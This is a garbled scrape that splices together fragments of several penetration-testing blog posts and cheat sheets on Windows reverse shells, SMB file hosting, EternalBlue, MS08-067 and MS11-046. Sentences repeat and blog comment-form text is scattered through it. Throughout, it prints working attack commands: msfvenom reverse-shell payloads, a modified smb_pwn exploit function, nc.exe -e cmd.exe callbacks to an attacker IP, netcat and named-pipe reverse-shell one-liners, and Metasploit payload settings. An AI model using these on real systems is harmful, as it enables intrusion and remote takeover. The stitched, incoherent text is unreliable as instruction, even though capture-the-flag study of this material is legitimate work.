A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. There are many guides and cheatsheets when it comes to reverse shells, so I won’t dive too deep into the subject. To start out, let’s run a nmap scan to see what ports are open on the box. TFTP. When it receives the connection it is then able to execute commands on the victim computer. I generated the payload with Veil but needed a way to transfer the file to the Windows server running ColdFusion through simple commands. This is a Microsoft protocol, the windows SMB version number is not what you are looking for, what you are looking for is the features that your SMB version is supporting. Here’s a shorter, feature-free version of the perl-reverse-shell: There’s also an alternative PERL revere shell here. Let’s run whoami to see what rights we have. python smbserver.py share smb, With our SMB server in place hosting the Windows binary to Netcat, we’re almost ready to instruct the webserver to connect to us. On the Meterpreter session, we type the command shell to drop into a Windows shell on the Windows 10 target. Staged VS Unstaged Payloads You … This enumeration script mentioned earlier can also enumerate for stored credentials and dump them in a file.. 3. On your platform (win 7), SMB3 is not supported (one of the main features is encryption). Secondly, the current version of Watson is not compatible with Windows 7. In this instance, I’m using an unstaged TCP reverse shell, with the LHOST set to 1.2.3.4, and the LPORT set to 1234. Then we will setup a listener to intercept the reverse shell using msfconsole and the multi handler exploit. OSCP Windows PrivEsc - Part 1 5 minute read As stated in the OSCP Review Post, I came across many good resources for Linux Privilege Escalation but there were just a few for Windows. smb 139,445 Remote Code Execution Remote Code Execution Linux Windows Windows Table of contents MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) Reverse Shell Cheat Sheet Check list File Shell Code Reverse Shell using PowerShell Windows remote desktop from Linux I started a quick tcpdump to capture ICMP requests to/from my VPN connection using the below command, and then execute the ping command in our webshell.tcpdump -i tun0 -n icmp. I’m rating this as an easy box since the privilege escalation piece was simple when utilizing a kernel exploit, and the the initial way in isn’t super realistic. Now start your bind shell or reverse. In this writeup, we will take a look at file transfer over smb and http, how to migrate to PowerShell from a standard cmd shell and lpeworkshop … To start out, let’s run a nmap scan to see what ports are open on the box. Fill in your details below or click an icon to log in: You are commenting using your WordPress.com account. Text.txt on windows XP SP 1 is deleted. Back in our reverse shell, let’s query the registry to see what version of .NET we’re running.reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP". I created an aspx payload through msfvenom, but I was unable to get a reverse shell this way. This is the command I use, but you can use whatever you like best. wsl whoami . nmap -T4 -sV -sC 10.10.10.5 -oA /nmap From the output of the scan, we see that FTP on port 21 is open to anonymous login. So, how do we tunnel SMB over SSH and keep local file sharing working? It is not uncommon during internal penetration tests to discover a file share which contains sensitive information such as plain-text passwords and database connection strings. Finally, I found Kali has a built-in aspx webshell located in our webshells directory. Most Windows versions old and new offer a command line FTP client by default. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.4 LPORT=443 -f exe > shell.exe Then modify the code so it will upload and run our exploit as shown below: def smb_pwn(conn, arch): smbConn = conn.get_smbconnection() smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe') service_exec(conn, r'c:\test.exe') We’re going to add a virtual adapter to our Windows computer and create a SSH tunnel over the virtual interface. nmap -T4 -sV -sC 10.10.10.5 -oA /nmap. SMB is a protocol for file sharing. After researching each one, I decided to try out MS11-046. Now we can set any of best payloads, let’s say windowsàshell_reverse_tcp by using the command below. Therefore, we have to run it with sudo. All communication takes place over port tcp/445 and depending on the selected payload may utilize other (chosen) ports as well – e.g. I chose to try hosting my own SMB server first. Windows clients use WS-Discovery to discover the presence of SMB servers, but depending on the version of the Windows client, network discovery may be disabled by default. This is a two part process. Both of these shell options require that commands be run on the remote host, so … Metasploit can pair any Windows exploit with any Windows payload such as bind or reverse tcp. At the C:WINDOWSsystem32> prompt, we issue the net users command. The reverse shell made our target machine connect back to the attacking machine (Kali Linux), providing a shell connection directly to the Windows Operating System. It’s a lot more sophisticated than the CMD, the old DOS-style command prompt found in nearly every version of Windows. However, the ftp.exe utility on Windows is an interactive program. If all goes well, we should receive a reverse shell back.\\10.10.14.45\share\nc.exe -e cmd.exe 10.10.14.45 8080. We also see that there are some files present; iisstart.html & welcome.png. Reverse TCP vs Bind TCP shell. In windows environment, LM/NTLM hash is used to authenticate to the remote server instead of plain text password. Let’s look at a quick example of how to do this. You can download the tool from https://github.com/rasta-mouse/Watson. Metasploit has a large collection of payloads designed for all kinds of scenarios. Reverse shell. I need to access the SMB share in the Windows file browser as follows: \\192.168.0.3\ Hosting PHP Web Shell in SMB Sharing. nc -nvlp 8080, Everything’s set up! Sign up for a free GitHub account to open an issue and contact its maintainers and the community. To do this, we will use the command line tool msfvenom. There are tons of cheatsheets out there, but I couldn't find a comprehensive one that includes non-Meterpreter shells. SMB is a protocol which is widely used across organisations for file sharing purposes. So we’ve got the ability to execute commands on the system. Windows Server 2012 R2 & 2016: PowerShell methods (Remove-WindowsFeature FS-SMB1) Windows 8.1 and Windows 10: Add or Remove Programs method Let’s view the source code to get an idea of how the exploit works. Change ), MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter), https://www.privateinternetaccess.com/pages/buy-vpn/infinitelogins, https://www.youtube.com/c/infinitelogins?sub_confirmation=1, Hack the Box Write-Up: NINEVAH (Without Metasploit) | Infinite Logins, Abusing Local Privilege Escalation Vulnerability in Liongard ROAR <1.9.76 | Infinite Logins. Now that we have our privesc executable, let’s move that into our SMB file-share so we can transfer it to the victim. Sniper info card TL;DR. The throttle limit applies only to the current cmdlet, not to the session or to the computer. We will generate a reverse shell payload, execute it on a remote system, and get our shell. In this tutorial we’ll be setting up a Reverse Shell payload on the USB Rubber Ducky that’ll execute in just 3 seconds. Usually, this command will also return a list of installed patches, but nothing was returned here. The latest installed on our victim is 3.5, so this is what we’ll select. Kali has a built-in SMB server through a python script. This was a simple box, but I did run into a curve-ball when getting my initial foothold. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines. Courses focus on real-world skills and applicability, preparing you for real-life challenges. / ubuntun1604.exe config --default ... auxiliary / admin / smb / ms17_010_command MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command Execution auxiliary / scanner / smb / smb_ms17_010 MS17-010 SMB RCE Detection exploit / windows / smb / … So, how do we tunnel SMB over SSH and keep local file sharing working? So, we can choose the MS08-067 vulnerability to exploit or open a command shell as well as we can create an administrator account and start a remote VNC session kind of … IIS runs code in asp/aspx, so my next thought was to create an asp/aspx payload to get a reverse shell connection. From the output of the scan, we see that FTP on port 21 is open to anonymous login. PAYLOAD => windows/shell/bind_tcp msf exploit(ms08_067_netapi) > exploit. This means we’ll need to dig through the Commits on the Github to download the original release of the application if we want to run it on our target machine. First let’s find the actual payload part of the exploit in the code. ( Log Out / So we found that we can upload our own webpage to this IIS webserver, and then execute that webpage by browsing to it. Let’s find it on our system and copy it to our present working directory. [*] Started reverse TCP handler on 173.18.131.94:4444 [*] Connecting to the server… [*] Authenticating to 173.18.131.111:445|test as user ‘administrator’… First we will generate a reverse shell payload with MSFvenom. Basically, a virtual network adapter is a software application that allows a computer to connect to a network. What I use this payload for is to add a local administrator to the machine. Fill in your details below or click an icon to log in: You are commenting using your WordPress.com account. The website of the company Sniper Co. is vulnerable to a Remote F ile Inclusion (RFI) through SMB.We will use it to include a PHP payload that will download Netcat on the server and start it to get a reverse Powershell.Then we analyze the website source code and find the password of the database that is the same as the Windows … The result will be a reverse shell on a Windows 7 machine using Empire & Meterpreter. We also need to adjust the architecture to match our victim machine. A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. If this parameter is omitted or a value of 0 is entered, then Windows PowerShell® calculates an optimum throttle limit for the cmdlet based on the number of CIM cmdlets that are running on the computer. Let’s get some information about the computer to see what we’re working with. Introduction. The purpose of a reverse shell is simple: to get a shell. It used to … Basically, a virtual network adapter is a software application that allows a computer to connect to a network. Port 80 is open and running Microsoft IIS 7.5, a webserver. We’re going to add a virtual adapter to our Windows computer and create a SSH tunnel over the virtual interface. Besides, SMBv1 protocol is supported in Windows 10. there is a good article talking about how to determine the SMB version: Windows Server 2012 R2: Which version of the SMB protocol (SMB 1.0, SMB 2.0, SMB 2.1, SMB 3.0 or SMB 3.02) are you using? Once executed, you will be provided with a remote shell. This FTP client can be leveraged to transfer files between victim and attacker. For some reason even though you are uploading an exe the ftp command seems to default to ASCII for some odd reason. The 3 Second Reverse Shell with a USB Rubber Ducky. ( Log Out / This “reverse” SERVER method requires Keimpx to be run with root privileges so that it can spawn the SMB server on a privileged port tcp/445 (Note a privileged port is any port below 1024). The purpose of a reverse shell is simple: to get a shell. The attacking computer typically listens on a specific port. It can create a reverse TCP connection to our mashing. This can be anything from a reverse shell via powershell, launchng the calculator, killing minesweeper…you get the drift. I'm attempting to do my first pen test with Blue machine(10.10.10.40). Change ), You are commenting using your Facebook account. Introduction. ( Log Out / Let’s spin up the server to a fileshare named “share” using the following command. 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 English (NX) 5 Windows 2003 SP0 Universal 6 Windows 2003 SP1 English (NO NX) 7 Windows 2003 SP1 English (NX) 8 Windows 2003 SP2 English (NO NX) 9 Windows 2003 SP2 English (NX) In this example, you can see that the exploit lists Automatic Targeting as one option. However, the ftp.exe utility on Windows is an interactive program. In … Powershell output seems to do some sort of encoding that will generate an invalid PE file when you redirect the output to file, but running these under cmd.exe works correctly. Let’s head back to the cmdasp webshell and run the following command. PSA: run these commands via cmd.exe, not in Powershell. To check the maximum protocol setting you can use the shell command as shown before, or check the Microsoft Networking -> Advanced Settings for the current settings: This is a super awesome tool, but there are a couple caveats. Generally, while abusing HTTP services or other programs, we get RCE vulnerability. However even if a file share doesn't contain any data that could be used to connect… No matter what I tried, I kept running into an error.. “This program cannot be run in DOS mode”. set payload windows/shell_reverse_tcp 8) Setting up Payload Options before exploitation show options. ( Log Out / So, in order for this to work the remote system has to be able to reach us on port tcp/445. After viewing the page source, we see that the website is jus… Let’s open a browser and see what we see at that page. Change ), Hack the Box Write-Up: DEVEL (Without Metasploit), Hack the Box Write-Up: Arctic (Without Metasploit) | Infinite Logins, Hacking Methodology Cheatsheet | Infinite Logins, Turning Command Execution to Reverse Shell. ( Log Out / This article will help those who play with CTF challenges because today we will discuss “Windows One-Liner” to use malicious commands such as PowerShell or rundll32 to get the reverse shell of the Windows system. This is the command I use, but you can use whatever you like best. Finally we will inject the reverse shell dll with DoublePulsar which will initiate the reverse shell from the Windows 2003 server host to the Kali Linux attack box. Reverse shell. As an example I used the Eternalblue exploit to get a simple command shell with local system rights on a Windows configuration that didn't have the latest updates. SMB Server Tranfer files to the target machine is particularly useful when we have already had a reverse shell on Windows. Great! Pass The Hash. First, it’s written in C#. A reverse shell is a type of shell where the victim computer calls back to an attacker’s computer. We see that we’re now presented with a shell in the System32 directory. Courses focus on real-world skills and applicability, preparing you for real-life challenges. The output confirms that our box received a ping request from the webserver — great! gedit 40564.c, Using those instructions, let’s compile the code.i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32, Now that we have our privesc executable, let’s move that into our SMB file-share so we can transfer it to the victim.mv MS11-046.exe smb, Back in our reverse shell, let’s execute our payload. We’re going to use a virtual network adapter. Alright cool, we see the page. There are, of course, many other things you can do with valid Windows credentials. Let’s connect to the FTP client & see if we can add files to the website.echo Hello > test.txtftp 10.10.10.5anonymousanonymousput test.txt, Now let’s attempt to browse to our test file.http://10.10.10.5/test.txt. ( Log Out / This article will help those who play with CTF challenges because today we will discuss “Windows One-Liner” to use malicious commands such as PowerShell or rundll32 to get the reverse shell of the Windows system. We see a TON of exploits available on this box. Change ), You are commenting using your Google account. Please consider supporting me on Patreon:https://www.patreon.com/infinitelogins, Purchase a VPN Using my Affiliate Linkhttps://www.privateinternetaccess.com/pages/buy-vpn/infinitelogins, SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW https://www.youtube.com/c/infinitelogins?sub_confirmation=1. Reverse shell. Many (to most) Windows systems, as well as Linux, have this port open by default, with unsecured shares and un-patched systems unknowingly exposed to everyone [that wants to know]. Let’s go into Build, and launch Configuration Manager. Moves the reverse shell executable to the web root directory so the file can be accessed remotely over HTTP and SMB. Change ), You are commenting using your Twitter account. Then, it uses the native Windows SMB functionality to execute the supplied command on the remote Windows system while redirecting its output onto our writable network share. A quick whoami command confirms that we now have full SYSTEM access. Using the shell. In a reverse shell a we open a connection from victim server to attacker's mashing. Lets locate that and copy it into our current working directory.cp /usr/share/doc/python-impacket/examples/smbserver.py . How to gracefully remove SMB v1 in Windows 8.1, Windows 10, Windows 2012 R2, and Windows Server 2016 Windows Server 2012 R2 and Windows Server 2016: Server Manager method for disabling SMB. Working with Payloads. for reverse shell. Back in our reverse shell, let’s execute our payload. Most Windows versions old and new offer a command line FTP client by default. We see that we’re now presented with a shell in the System32 directory.\\10.10.14.45\share\MS11-046.exe. Have a question about this project? Enter the above command in terminal to … lpeworkshop being one of those, lacks a good walkthrough. ( Log Out / Alright, so we’re working with a 32-bit Windows 7 machine. Useful netcat reverse shell examples: Don't forget to start your listener, or you won't be catching any shells :) nc -lnvp 80 nc -e /bin/sh ATTACKING-IP 80 /bin/sh | nc ATTACKING-IP 80 rm-f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p. The attacking computer typically listens on a specific port. We also see that we’ve received a reverse shell in our Netcat listener! SMB Relay Attack is a type of attack which relies on NTLM Version 2 authentication that is normally used in most companies. But first, we must spin up a Netcat listener to catch the connection request. We’ll change the Configuration to Release, and Platform to x86, the same as our victim machine. Target m/c → 192.168.1.134. can be resolved by setting the FTP mode to binary before uploading the nc.exe file, this saves you the hassle of setting up the SMB share and running it from there. Finally, let’s select the Build drop-down again and click Build Watson. In case you can find a working pipe name or use credentials, creating a file on the target machine may not be that helpful for us. It was a very limited, non-interactive shell and I wanted to download and execute a reverse Meterpreter binary from my attack machine. Eternalblue used in ransomware Since the Eternalblue exploits have been leaked the SMBv1 vulnerability has been used in a large number of ransomware attacks such as: WannaCry, Petya and NotPetya. For more in depth information I’d … Looking at the results, we do see the SMB request in our terminal window hosting nc.exe. The output at the bottom of the window should show you the file location this was built to. One tip, however, you don’t need to set up an SMB share to run nc.exe. I’ll name mine something simple, “smb”.mkdir smb, Now let’s find the Windows binary for Netcat and copy it to this directory we just made.cp /usr/share/windows-binaries/nc.exe smb, Looks like we’ve got everything in place! A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The error you got when trying to run nc.exe directly (This program cannot be run in DOS mode”.) Finally we will inject the reverse shell dll with DoublePulsar which will initiate the reverse shell from the Windows 2003 server host to the Kali Linux attack box. Sniper info card TL;DR. We see that we’re not SYSTEM, so our job isn’t done yet.. We’re on the machine, but we don’t have complete control of it yet. Port 445 is a TCP port for Microsoft-DS SMB file sharing. Netcat Reverse Shell. Have a question about this project? Let’s run a quick ping test to make sure we’re able to communicate from this system to ours. We also see that there are some files present; iisstart.html & welcome.png. This means that we’ll need to open Watson in Visual Studio, an application not available in Kali Linux. Now we know how to compile the Watson script. Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements.Designed as a quick reference cheat sheet providing a high level overview of the typical commands a third-party pen test company would run when performing a manual infrastructure penetration test. Eternalblue used in ransomware Since the Eternalblue exploits have been leaked the SMBv1 vulnerability has been used in a large number of ransomware attacks such as: WannaCry, Petya and NotPetya. Trivial file transfer protocol is another possiblity if tftp is installed on the system. In this case CrackMapExec spawns a local SMB server with a writable network share. PAYLOAD => windows/shell/bind_tcp msf exploit(ms08_067_netapi) > exploit. In order to use this SMB server, we need to first create a directory to host as a fileshare. Let’s modify the exploit code to get a reverse shell. Unfortunately, when we are listening to what is going on in the network, we’re able to capture a certain part of the traffic related to the authentication and also relay it to the other servers. Let’s open a browser and see what we see at that page. My general process… Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements.Designed as a quick reference cheat sheet providing a high level overview of the typical commands a third-party pen test company would run when performing a manual infrastructure penetration test. Netcat Reverse Shell. Perfect! Metasploit can pair any Windows exploit with any Windows payload such as bind or reverse TCP. Table of Contents:– Non Meterpreter Binaries– Non Meterpreter Web Payloads– Meterpreter Binaries– Meterpreter Web Payloads, Donations and Support:Like my content? I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP. set payload windows/x64/exec. The MS17-010 (EternalBlue, EternalRomance, EternalChampion and EternalSynergy) exploits, which target Microsoft Windows Server Message Block (SMB) version 1 flaws, were believed to be developed by the NSA and leaked by the Shadow Brokers in April of 2017. Text.txt on windows XP SP 1 is deleted. Using powershell we can implement a netcat like reverse shell. Preparing for Remote Shell Access. Attacker m/c → 192.168.1.129 (kali linux) I set my Windows machine up with the Visual Studio Community edition, and opened Watson.sln from the Github page. First of all let's clear what is a reverse tcp shell, What's a bind shell and how they work. So if we can’t execute malicous code directly on the disk of the machine, how else can we get our code to run? To prevent a non-interactive reverse shell from hanging indefinitely an FTP command file can be used. Here’s an example of using Metasploit psexec_psh method to spawn a reverse shell as local Administrator using a clear text password: Let’s run dir to see if we actually have command execution, and if we do, what directory we’re in. As we can see, there are only two users, the Administrator and the l3s7r0z user. Does this mean that the machine is missing all patches? Step 1. Created my own malicous exe via msfvenom, transferred that to the box, and attempted to execute locally on the disk. Enabling the SMB 1.0/CIFS Client and SMB 1.0/CIFS Server feature for non-legacy systems is not required and Windows 10 can work with the QTS system. Change ), You are commenting using your Google account. It is not uncommon during internal penetration tests to discover a file share which contains sensitive information such as plain-text passwords and database connection strings. This lists all the users within the windows machine. \\10.10.14.45\share\MS11-046.exe The following special commands are supported: run_shell: drops you an system shell (allowing you, for example, to change directories) Change ), You are commenting using your Twitter account. Port 80 is open and running Microsoft IIS 7.5, a webserver. In this blog post we'll dig a little deeper and explore the post-exploitation possibilities of using a more advanced payload: the Meterpreter. Metasploit has a large collection of payloads designed for all kinds of scenarios. > vim /etc/samba/smb.conf Samba configuration where the default SMB directory is set to /var/www/, browsable, read-only and guest access is allowed. My thought was perhaps we could execute a malicious file from a network share, and load it straight into memory. SMB is a protocol which is widely used across organisations for file sharing purposes. In both of these situations there is a Attacker mashing and a victim server. A reverse shell is a type of shell where the victim computer calls back to an attacker’s computer. First we will generate a reverse shell payload with MSFvenom. Discoverability through broadcast protocols is a convenience feature and is not a requirement to access the SMB server. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP. This command can be used for generating payloads to be used in many locations and offers a variety of output options, from perl to C to raw. Sign up for a free GitHub account to open an issue and contact its maintainers and the community. ( Log Out / We also find that the author provides compiling instructions. In this case, the SAMBA server IP is 192.168.0.3. Hi guys! Generally, while abusing HTTP services or other programs, we get RCE vulnerability. The website of the company Sniper Co. is vulnerable to a Remote F ile Inclusion (RFI) through SMB.We will use it to include a PHP payload that will download Netcat on the server and start it to get a reverse Powershell.Then we analyze the website source code and find the password of the database that is the same as the Windows account of the user chris. mv MS11-046.exe smb. We’ll need to make sure to compile Watson using the correct configuration for our target machine. To prevent a non-interactive reverse shell from hanging indefinitely an FTP command file can be used. If we have the administrator access on the windows system, we can dump the hash from the memory using the tools like Windows … Hi, Thank you for the write-up, it was very helpful! searchsploit ms11-046locate exploits/windows_x86/local/40564.ccp /usr/share/exploitdb/exploits/windows_x86/local/40564.c . I’ve installed this on my Windows box. Working with Payloads. Powershell was first introduced with Windows XP SP2 and it has since been included by default in Windows since Vista. I like to use an online note taking platform called pentest.ws to store all of the reverse shell scripts and one-liners that I’ve collected. Looking in the code, we can find a function called smb_pwn. Specifies the maximum number of concurrent operations that can be established to run the cmdlet. Surely there’s some sort of old Win7 privilege escalation exploit that would work on an unpatched box.. There’s a tool called Watson that will scan a system to find any local privilege escalation exploits that may exist on a machine. This FTP client can be leveraged to transfer files between victim and attacker. Scan target machine and check for SMB open port, in my case target ip is 192.168.1.134. Port 445 (SMB) is one of the most commonly and easily susceptible ports for attacks. Remember how we saw that file on the FTP server from the nmap output? After viewing the page source, we see that the website is just pulling up welcome.png as the image. Change ), You are commenting using your Facebook account. We see that the box is running .NET 2.0, 3.0, and 3.5. Let’s copy this down to our present working directory. Offensive Security certifications are the most well-recognized and respected in the industry. Windows does not have convenient commands to … So, we can choose the MS08-067 vulnerability to exploit or open a command shell as well as create an administrator account or start a remote VNC session on the victim computer. Let’s copy that over to our Kali machine, host it in the SMB fileshare directory, and then execute it on our victim the same way we did Netcat.\\10.10.14.45\share\Watson.exe. PAYLOAD => windows/shell/bind_tcp msf exploit(ms08_067_netapi) > exploit. So we have command execution and can communicate to/from the box, but how do we turn this into an interactive reverse shell? Transferred the windows binary for nc.exe and attempted to execute locally on the disk. These are just my go-to methods for getting a quick shell. That is great! We’ll need to adjust the Target Framework to patch our target machine.